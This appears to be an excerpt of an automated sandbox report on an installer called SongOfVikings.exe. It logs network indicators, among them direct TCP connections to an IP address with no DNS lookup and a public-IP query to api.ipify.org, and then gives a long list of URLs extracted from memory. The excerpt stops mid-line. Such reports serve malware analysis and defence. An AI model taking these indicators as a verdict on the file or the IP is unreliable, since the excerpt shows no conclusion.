Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211
Source: unknown	TCP traffic detected without corresponding DNS query: 40.66.40.211

Source: global traffic

HTTP traffic detected: GET /?format=json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/1.6.8Accept-Encoding: gzip, compress, deflate, brHost: api.ipify.orgConnection: close

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1085
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1452expandIntegerPowExpressionsThe
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1512
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1637
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1936
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2046
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2152skipVSConstantRegisterZeroIn
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2273
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2894
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2978
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3027
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3045
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3246allowClearForRobustResourceInitSome
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3682allowES3OnFL100Allow
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3729
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3997
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4214
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4267
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4646
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/482
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007disableDrawBuffersIndexedDisable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5469
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5577
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658forceGlErrorCheckingForce
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750forceRobustResourceInitForce-enable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036dumpShaderSourceWrite
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279cacheCompiledShaderEnable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7527
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724disableAnisotropicFilteringDisable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760enableShaderSubstitutionCheck
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761Frontend
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://austingroupbugs.net/view.php?id=542
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://blog.izs.me)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://blog.izs.me/)
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gd_intermediate.crt0
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository100.
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cgit.freedesktop.org/xorg/xserver/tree/COPYING
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cldr.unicode.org/index/downloads
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/smhasher/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/v8
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1094869
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/110263
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1144207
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1165751disableProgramBinaryDisable
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1171371
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181068
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/1181193
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/308366
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/403957
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/550292
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/565179
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642227
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/642605
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/644669
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/650547
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/672380
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/709351
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/797243
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/809422
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/830046
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/849576
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/883276
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/927470
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620allowTranslateUniformBlockToStructuredBufferThere
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.godaddy.com/gds1-20
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=16452
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://devel.freebsoft.org/speechd
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://developer.android.com/tools/extras/support-library.html
Source: SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ejemplo.com
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://encoding.spec.whatwg.org/#big5-encoder
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/commonnode-set..
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedorahosted.org/lohit>
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://feross.org
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fossil-scm.org).
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freedesktop.org
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://gcc.gnu.org/bugzilla/show_bug.cgi?id=59788
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://github.com/broofa
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.github.io/snappy/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icl.com/saxon
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icl.com/saxonorg.apache.xalan.xslt.extensions.RedirectxsltDocumentElem:
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icu-project.org/docs/papers/gb18030.html
Source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://int3.de/
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://istanbul-js.org/
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://juliangruber.com
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://labs.creativecommons.org/licenses/zero-waive/1.0/us/legalcode>
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://localhosthttp://127.0.0.1object-src
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://me.abelcheung.org/articles/research/what-is-cp951/
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://moztw.org/docs/big5/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mxr.mozilla.org/comm-central/source/mozilla/netwerk/base/src/nsURLParsers.cpp
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://n8.io/)
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://narwhaljs.org)
Source: SongOfVikings.exe, 00000000.00000002.1958725334.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SongOfVikings.exe, 00000000.00000000.1709135822.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0J
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.org/licenses/MIT
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://re-becca.org)
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://re-becca.org/)
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://s..
